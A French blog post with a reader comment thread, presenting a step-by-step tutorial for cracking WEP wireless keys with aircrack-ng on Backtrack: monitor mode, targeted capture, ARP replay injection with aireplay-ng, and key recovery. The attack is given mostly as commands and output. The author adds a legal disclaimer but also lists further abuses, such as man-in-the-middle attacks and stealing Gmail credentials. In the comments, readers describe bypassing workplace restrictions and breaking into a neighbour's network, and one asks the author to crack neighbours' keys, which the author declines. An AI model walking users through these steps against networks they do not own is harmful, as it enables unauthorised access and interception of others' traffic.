Bonjour!

En ce moment en cours on parle de temps à autre de sécurité sur les réseaux wifi et autre. Or parfois je fais le mec chiant en disant « Oui, mais c’est pas sécurisé » etc. On me regarde avec des yeux ronds et certains doivent penser « Oui bon, la sécurité, à moins de tomber sur un super hacker, pas trop de risques… arrête de nous faire chier! ». Hé bien non justement… Je vais vous montrer à quel point il est simple de craker une clé WEP sur un réseau sans fils et qu’il est nul besoin d’être un génie en informatique… la preuve, même moi j’y arrive et je suis tout sauf un génie…

Passons à la pratique: que faut-il pour cracker une clé WEP? Il faut:

- Un PC: un laptop de préférence

- Un bon OS: j’utiliserai Backtrack 3, une distribution Linux dédiée à la sécurité

- Une bonne carte wifi: une Alfa AWUS036H :)

La première étape est d’installer Backtrack sur une clé USB et de la rendre bootable, rien de plus simple: télécharger Backtrack USB et exécuter bootinst.sh (dans BOOT). Ensuite on la colle dans les fesses du laptop, on branche sa carte wifi, on démarre le portable et on boot sur la clé dans le BIOS.

AWUS036H 1000mW

Une fois sous Backtrack on ouvre un terminal et on tape:

iwconfig

ce qui doit donner un truc ressemblant à ça:

wlan2     IEEE 802.11bg  ESSID: »FreeWifi »
Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
Tx-Power=20 dBm
Retry min limit:7   RTS thr:off   Fragment thr=2352 B
Power Management:off
Link Quality:0  Signal level:0  Noise level:0
Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Ce qui nous intéresse c’est wlan2 qui est notre carte wifi.

Maintenant pour écouter le trafic il faut passer la carte en mode monitor. Backtrack fourni la suite logicielle aircrack-ng qui le permet (note: sous ubuntu, installer en tapant sudo apt-get install aircrack-ng). Pour passer la carte en mode monitor il suffit d’utiliser airmon-ng, pour cela:

airmon-ng start wlan2

Ce qui donne un truc du style:

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
3597    NetworkManager
3616    wpa_supplicant
3621    avahi-daemon
3622    avahi-daemon
4643    dhclient

Interface    Chipset        Driver

wlan2        RTL8187     rtl8187 – [phy2]

Bref, maintenant que tout est opérationnel on va rentrer dans le vif du sujet! :D

Ensuite nous allons chercher des réseaux wifi utilisant le cryptage WEP, pour cela:

airodump-ng –encrypt wep wlan2

Cela nous donne:

scan airodump

BSSID: correspond à l’adresse MAC du routeur (ex: Livebox, Neufbox, etc.)

ESSID: c’est le nom du réseau (ex: neuf wifi)

CH: pour channel, c’est le canal.

En dessous: STATION, c’est l’adresse MAC des PC clients connecté à la box (BSSID). Ici on voit qu’il identifie bien des clients mais qu’il n’arrive par à trouver à quelle box (BSSID) ils sont associés.

NOTE: les screens du dessus sont sous Ubuntu, alors que les screens qui vont venir sont sous Backtrack. Sous Ubuntu, je n’avais pas de box associée, mais peu importe.

Imaginons donc que vous avez votre BSSID et une STATION connecté, vous lancez:

airodump-ng -w DATA-NUMERICABLE -c 6 –bssid XX:XX:XX:XX:XX:XX wlan2

Explications:

-w = écrire dans un fichier suivit du nom de fichier (ici DATA-NUMERICABLE)

-c = le channel (ici le channel 6)

– bssid = l’adresse mac de la box (BSSID)

Cette commande permet de cibler uniquement la connexion wifi voulue et à capturer les DATA dans un .cap

capture data

Maintenant que la capture est lancée, nous allons injecter des paquets pour faire grimper les DATA.Pour ce faire nous allons utiliser aireplay-ng en tapant:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX -h CC:CC:CC:CC:CC:CC wlan2

-c = n’importe quoi, une adresse MAC aléatoire

-b = le BSSID de la box

- h = l’adresse MAC de la station client connecté à la box

Une fois la commande lancée, il va se mettre à lire des paquets, puis vous proposer d’en injecter (voir screen). Un bon paquet commence par 0842 !!

injection

Voila une fois que vous approuvez le paquet, l’injection commence et les DATA devraient grimper à mort! Si vous regardez mon screen précédent vous remarquerez  dans la colonne DATA que je suis déjà à 87897 ! En fait, j’ai fait le screen après avoir lancé le craquage du .cap (ce que je vais expliquer). Normalement à partir de 50000 vous pouvez commencer à craquer.

Dernière étape: le décryptage

On a donc fait nos capture dans le fichier DATA-NUMERICABLE, nous avons plus qu’à utiliser aircrack-ng, pour cela ouvrir dans un troisième terminal:

aircrack-ng -P2 DATA-NUMERICABLE.cap

Ayé c’est parti et normalement au bout de quelques minutes:

keyfound

Voila c’est fini vous avez votre clé WEP! ;)

NOTE:

Bien sûr vous n’avez le droit de faire ça que sur votre connexion pas sur celle du voisin. Vous me direz, « Quel serait l’intérêt de le faire chez le voisin si ce n’est pour lui piquer sa connexion internet? » Mais ça sert à plein de choses!!! Faire des MITM et de l’Arp Poisonning et piquer ses identifiants Gmail, Spoofer ses DNS, mener des attaques sur le web, etc… les utilisations illégales sont multiples, mais c’est INTERDIT! (et je suis un brave étudiant en Droit!! ;) )

Voili, voilou et bon week-end

Be Sociable, Share!

26 réponses à “Cracker une clé WEP en moins de 5 minutes…”
  1. axx dit :
      Surfe avec Firefox 3.0.15 Firefox 3.0.15 sur Windows XP Windows XP
    Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)

    Salut Friendly Froggy, toujours aussi intéressant.
    Cette technique je l’utilise souvent quand je vais dans de nouvelles entreprises souvent les nouveaux ont des restrictions auquel je ne suis vraiment pas habituer.

  2. doom dit :
      Surfe avec Firefox 2.0.0.14 Firefox 2.0.0.14 sur GNU/Linux GNU/Linux
    Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

    Bonjour, je test mon reseau! sur ma propre rooteur sans feel! signial est a 100! toute va bien! sauff la

    Size: 80, FromDS: 1, ToDS: 0 (WEP)

    BSSID = 00:24:56:48:7C:E9
    Dest. MAC = 01:00:5E:00:00:16
    Source MAC = 00:21:5D:85:C7:16

    0×0000: 0842 0000 0100 5e00 0016 0024 5648 7ce9 .B….^….$VH|.
    0×0010: 0021 5d85 c716 f047 cbfa ee00 8e1c 67ee .!]….G……g.
    0×0020: 48e6 96dd 3800 c08b f6e9 9bf1 7bc0 2b30 H…8…….{.+0
    0×0030: 4b82 9dc8 afe3 0276 5ff9 fbb6 e72b ca6d K……v_….+.m
    0×0040: 8415 89b7 e33e 6270 26ba 224f 9ae5 38b3 …..>bp&. »O..8.

    Use this packet ? yes

    Saving chosen packet in replay_src-0111-234149.cap
    You should also start airodump-ng to capture replies.

    Sent 349 packets…(499 pps)

    Il blok ‘a 349 ou pas beaucoup plus! Tu peu me dire pourquoi et m expliquer.. merci d avance l ami

  3. PH dit :
      Surfe avec Firefox 3.0.17 Firefox 3.0.17 sur Ubuntu 9.04 Ubuntu 9.04
    Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.17) Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/3.0.17

    Salut!

    C’est que le paquet n’est pas bon, il faut que tu en prennes un autre. Lorsque tu as un bon paquet ça injecte illico et tu vois les IVs grimper sous airodump-ng.

    Souvent ça prend un peu de temps de trouver un bon paquet. Il faut les essayer un par un (que les 0842) et attendre celui qui marchera le mieux.

    Voili, voilou

  4. Dom dit :
      Surfe avec Firefox 2.0.0.14 Firefox 2.0.0.14 sur GNU/Linux GNU/Linux
    Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

    Salut et merci de m avoir repondu :)

    Je veux seulement tester mon reseau, pour la veriter je connais rien sous linux et dans tout ca.. hehe! jai suivi tes metodes un par un!
    Alors pour changer de paquets comment je fais..! Je fais des recherches sur google et tout et j Ai un peu de misere.

    Merci a l avance!

  5. Dom dit :
      Surfe avec Firefox 2.0.0.14 Firefox 2.0.0.14 sur GNU/Linux GNU/Linux
    Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

    mon msn est mon adresse hotmail, alors si tu veux de add ;)

  6. PH dit :
      Surfe avec Firefox 3.5.7 Firefox 3.5.7 sur Windows XP Windows XP
    Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7

    Une fois que tu as choisi le paquet et que celui-ci n’injecte pas bien, il faut que tu appuies sur la flèche bas du clavier pour rechercher & passer à un autre paquet (ou Ctrl… je ne me rappelle plus bien de la touche). Ensuite tu ré-injectes le nouveau paquet.

    Tu as quoi comme carte wifi? Sous Backtrack?

  7. Dom dit :
      Surfe avec Internet Explorer 6.0 Internet Explorer 6.0 sur Windows XP Windows XP
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)

    ma carte est une linksys model : wmp54g
    le nom de marte : wlan0

  8. Dom dit :
      Surfe avec Internet Explorer 6.0 Internet Explorer 6.0 sur Windows XP Windows XP
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)

    je sais pas comment changer de paquets… EX : aireplay-ng -2 -p 0841 -c 00:24:56:48:7C:E9 -b 00:24:56:48:7C:E9 -h 00:21:5D:85:C7:16 wlan0

    je fais que changer le 0841 ??

    ça me redonne toujours 0842 !

  9. PH dit :
      Surfe avec Firefox 3.5.7 Firefox 3.5.7 sur Windows XP Windows XP
    Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7

    Non non, 0841 c’est le type d’attaque, rien à voir avec les paquets (du moins je ne crois pas). Tu lances ta commande et si tu vois que ça fonctionne pas, tu appuis sur Ctrl ou autre. Je suis en cours là et sous Windows de plus, je ne peux pas t’aider dans la foulée. J’essayerai de te laisser un commentaire plus explicatif dans la semaine.

  10. Dom dit :
      Surfe avec Firefox 2.0.0.14 Firefox 2.0.0.14 sur GNU/Linux GNU/Linux
    Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14

    D<accord je vais attendre dans la semaine! merci

  11. dom dit :
      Surfe avec Firefox 3.5.3 Firefox 3.5.3 sur Ubuntu 9.10 x64 Ubuntu 9.10 x64
    Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3

    bonjour, seimplement pour dire j’ai telecharger ubuntu sur mon portable..!
    mais toujours des probleme pour aircrack…

    dabord.. Interface Chipset Driver

    eth1 Unknown wl (monitor mode enabled)
    le chipset est pas identifier.. ca raport?

    aussi..! rendu la!
    leblanc@ubuntu:~$ sudo airodump-ng –encrypt wep eth1
    ioctl(SIOCSIWMODE) failed: Invalid argument

    ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
    ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
    sure RFMON is enabled: run ‘airmon-ng start eth1 ‘
    Sysfs injection support was not found either.

    je suis bloker la! je comprend pas.. et la ca fais 2 semaines que jesseye.. que je jesseye! j’ai une tete de cochon et j’aimerais reussir!
    alors si qqn peu m’aider mon msn leblanc1985@hotmail.com.. ou ben me épondre icitte!

    merci 100 fois

  12. dom dit :
      Surfe avec Firefox 3.5.3 Firefox 3.5.3 sur Ubuntu 9.10 x64 Ubuntu 9.10 x64
    Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3

    j’ai trouvé ma carte si ca peu vous aider!

    broadcom BCM94312mcg

  13. PH dit :
      Surfe avec Firefox 3.0.17 Firefox 3.0.17 sur Ubuntu 9.04 Ubuntu 9.04
    Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.17) Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/3.0.17

    Salut Dom!

    Alors quelques petites choses:
    1°- Ne donne pas ton adresse MSN en clair tu vas être inondé de SPAM…
    2°- broadcom BCM94312mcg: ce sont les drivers pas la carte. Il faut que tu vérifies si ta carte permet le monitoring et l’injection (regarde sur le wiki de backtrack.fr). Est-ce une carte PCI Linksys WMP54G?
    3°- Laisse tomber Ubuntu pour cracker des clés WEP, Backtrack est beaucoup plus adapté!

    Je crois que ta carte est adapté pour l’injection. Je n’ai pas beaucoup de temps en ce moment, mais j’essayerai de te faire une vidéo tuto vendredi soir (j’espère que je ne vais pas oublier… :s rappelle le moi sinon)

    A+

  14. dom dit :
      Surfe avec Firefox 3.5.7 Firefox 3.5.7 sur Windows XP Windows XP
    Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)

    Ma carte est une broadcom 802.11g
    Elle est jamais détecter avec les backtrack..

    est modite la carte la lol

  15. dom dit :
      Surfe avec Firefox 3.5.7 Firefox 3.5.7 sur Windows XP Windows XP
    Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)

    Bon voila, Le problème.. Ma carte étais pas compatible, Alors là j’ai une nouvelle carte et toute marche très bien smile

    Un dernier problème!

    Code:

    airmon-ng start wlan2

    OK.
    Code:

    airodump-ng –encrypt wep

    wlan2 OK.
    Code:

    airodump-ng -w tuto -c 6 –bssid XX:XX:XX:XX:XX:XX wlan2

    ( tuto est le nom du fichier pour enrejustrer la capture )

    Code:

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX -h CC:CC:CC:CC:CC:CC wlan2

    Ok.

    Dernière commande
    Code:

    aircrack-ng -P2 tuto.cap

    Bon voilà mon problème est là. quand je tape la commande
    Code:

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX -h CC:CC:CC:CC:CC:CC wlan2 Ok.

    Il me dit Saving chosen packet in replay_src-0114-174351.cap
    you should also start airodump-ng to capture replies.
    et il créé replay_src-0114-174351.cap sur mon burreau.. Pourtant avec airodump-ng j’ai créé tuto.. ! alors à place de taper aircrack-ng -P2 tuto.cap j’ai deja esseyé aircrack-ng -P2 replay_src-0114-174351.cap

    et voila ça qui me dit

    Code:

    Opening replay_src-0114-174351.cap
    Read 1 packets.
    # BSSID ESSID encryption wep ( 1IVS.
    choosing firdt network as target
    Opening replay_src-0114-174351.cap
    Attack will be restarted every 5000 captured ivs.
    starting PTW attack with 1 ivs.
    failed. Next try with 5000 IVs.

    Voilà! Pour j’ai créé tuto..! la c’est comme si il avait 2 .cap.. alors toute les information peuvent ne pas se relier!

    Alors S.v.p Aider moi à comprendre et à le faire fonctionner pour une fois de toute! j’y suis presque!

    Merci

  16. dom dit :
      Surfe avec Firefox 3.5.7 Firefox 3.5.7 sur Windows XP Windows XP
    Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)

    ça fais 2 semaines la que j’esseye et il a toujours un problème, je capote… La il le reste juste à comprendre se petit détail sous back track 4….

  17. PH dit :
      Surfe avec Firefox 3.5.7 Firefox 3.5.7 sur Windows XP Windows XP
    Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7

    Salut Dom!

    Alors je ne vais pas avoir le temps de te faire une vidéo tuto, je suis encore à la fac…

    Si tu ne veux pas te prendre la tête tu peux aussi utiliser « Spoonwep ». Pour ce faire tu tapes spoonwep dans le terminal sous Backtrack.

    P.S: si tu n’as qu’un seul IVs, ça ne sert à rien de lancer aircrack-ng. Arrives tu à faire grimper les IVs??

  18. dom dit :
      Surfe avec Firefox 3.5.7 Firefox 3.5.7 sur Windows XP Windows XP
    Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)

    Toute marche #1 mon ami :)
    J’ai trouvé la kay…! mais elle est en code!
    Comment je fais pour la déchifrer..!

    Ex : Il me donne le pass du genre 34:Ed:56…… ect!

    Mais comment je fais pour savoir si c le nom de mon pass!

    Genre un ex : mon pass serais PATATE !

    Alors comment le rendre pour qui me dise que c’est PATATE ?

    c’est ma derniere étape =)

    merci de me répondre

  19. PH dit :
      Surfe avec Firefox 3.0.17 Firefox 3.0.17 sur Ubuntu 9.04 Ubuntu 9.04
    Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.17) Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/3.0.17

    Tu craques du WEP dom, pas du WPA, donc la clé va être du type: 34:ED:56 etc… Donc tu te connectes au ESSID tu rentres la clé et basta! :)

    Pour craquer des clé WPA, bon courage, il faut avoir des dico énormes (ex: 2Go) spécialement générés, et encore ils ne représentent que 0,07% des possibilités… En gros laisse tomber pour craquer du WPA…

  20. Anadrol dit :
      Surfe avec Google Chrome Frame 4.0 Google Chrome Frame 4.0 sur Windows 7 x64 Edition Windows 7 x64 Edition
    Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; Creative AutoUpdate v1.40.01) chromeframe/4.0

    Suite à un pari avec mon voisin qui a numericable en WEP,
    j’ai réussi facilement à récupérer la clé en HEX, mais comment je fais pour me connecter à lui ?

    J’ai essayé de convertir en ASCII mais ça me donne des caractères bizarres et ça ne fonctionne pas.
    Quel est le format de la clé et comment faut-il la rentrer exactement ?

    Merci !!

  21. Anadrol dit :
      Surfe avec Google Chrome Frame 4.0 Google Chrome Frame 4.0 sur Windows 7 x64 Edition Windows 7 x64 Edition
    Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; Creative AutoUpdate v1.40.01) chromeframe/4.0

    J’ai réussi, j’ai mis dans les paramètres Open System pour l’Authentication, WEP pour Data Encryption bien sur,
    je n’ai ni coché ASCII ni PASSPHRASE, j’ai juste collé les 26 caractères en HEX de la clé 128 bits dans network key et confirm network key.
    Je n’ai pas mis 0x devant et j’ai enlevé tous les : donc.

    Par contre j’ai remarqué que seul 3 ou 4 comme Key Index fonctionnent, si je mets 1 ou 2 ça ne connecte pas,
    ça correspond à quoi par curiosité ?

    Merci !

  22. faiz dit :
      Surfe avec Firefox 9.0.1 Firefox 9.0.1 sur Windows 7 Windows 7
    Mozilla/5.0 (Windows NT 6.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1

    j’ai un problème avec les IVS et les adresses MAC (STATION) qui n’apparais pas à savoir que je veut cracker cette fameuse clé WPA avec mon laptop genre ; DELL équiper d’une « carte de miniport Microsoft Virtuel Wifi » et  » DELL Wirless 1701 802.11 b/g/n

    je crois que sans adresse MAC (STATION) rien ne marche
    voir ci dessous ce que j’ai fait

    root@root:~# airmon-ng

    Interface Chipset Driver

    wlan0 Unknown brcm80211 – [phy0]

    root@root:~# airmon-ng start wlan0

    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    3647 dhclient3
    3699 dhclient3
    Process with PID 3647 (dhclient3) is running on interface wlan0

    Interface Chipset Driver

    wlan0 unknown brcm80211 – [phy0]
    (monitor mode enabled on mon0)
    root@root:~# airmon-ng

    Interface Chipset Driver

    wlan0 Unknown brcm80211 – [phy0]
    mon0 Unknown brcm80211 – [phy0]

    CH 9 ] [ BAT : 1 hour 12 mins ][ Elapsed: 12mins ][2012-01-21 12:19

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    B4:82:FE:EB:18:C6 -81 272 0 0 1 54 OPN DJAWEB
    00:15:EB:F6:15:2A -82 268 0 0 6 54 WPA TKIP PSK ZTE
    00:27:19:CB:D5:E0 -84 1067 0 0 1 54e OPN Midi
    F4:EC:38:E0:8F:1F -85 423 0 0 11 54e WPA2 CCMP PSK TP-LINK_E08F1
    B4:82:FE:80:77:22 -86 2 0 0 1 54 WPA TKIP PSK DJAWEB

    BSSID STATION PWR Rate Lost Packets Probes

    Reste Vide !!!!!

    root@root:~# airodump-ng -c 11 -w crackwpa 11 --bssid F4:EC:38:E0:8F:1F mon0

    "airodump-ng --help" for help.

  23. lilshayne dit :
      Surfe avec Google Chrome 20.0.1132.47 Google Chrome 20.0.1132.47 sur Windows 7 Windows 7
    Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11

    bonjour j’aimerai jouer a un jeux en ligne (fiesta) trankil mais avec free wifi je capte 1 ou 2 barre ca me deconnect toute les 5 ou 10 minute se qui est assez agassant pour un jeux en ligne de se fait pouriez vous me craquer la cle de kelke bboy s’il vous plait se serait vraiment sympas :
    NEUF_F234 => WPA_PSK
    freebox_PWPJUQ => WEP
    NEUF_A6F0 => WPA_PSK
    SFR_64C6 => WPA PSK
    Bbox-FD7BA8 => WPA_PSK
    FreeWifi_cesure => WPA2
    je ne sais pas si vous pouvez trouve une clee sans capter le reseau mais je demande comme meme, merci d’avance j’attent votre reponse avec impatientce
    je desespere :(

  24. PH dit :
      Surfe avec Firefox 13.0.1 Firefox 13.0.1 sur Windows 7 Windows 7
    Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1

    Bonjour,

    Non désolé je ne peux cracker la clé de personne. D’une part c’est illégal sans le consentement de la personne, d’autre part je ne pense pas que l’on soit voisins donc je ne capte pas les réseaux que vous voyez.

  25. Chady dit :
      Surfe avec Google Chrome 19.0.1084.56 Google Chrome 19.0.1084.56 sur Windows 7 Windows 7
    Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5

    Il y a un truc que je pige pas, a la fin devant le key found qu’est ce que c’est ? Ce n’est pas le mot de passe de la clé wifi !

  26. PH dit :
      Surfe avec Firefox 13.0.1 Firefox 13.0.1 sur Windows 7 Windows 7
    Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1

    @Chady : Si, dans mon screen c’est une clé WEP 128 bits, donc composée de 26 caractères hexadécimaux (8*13+24).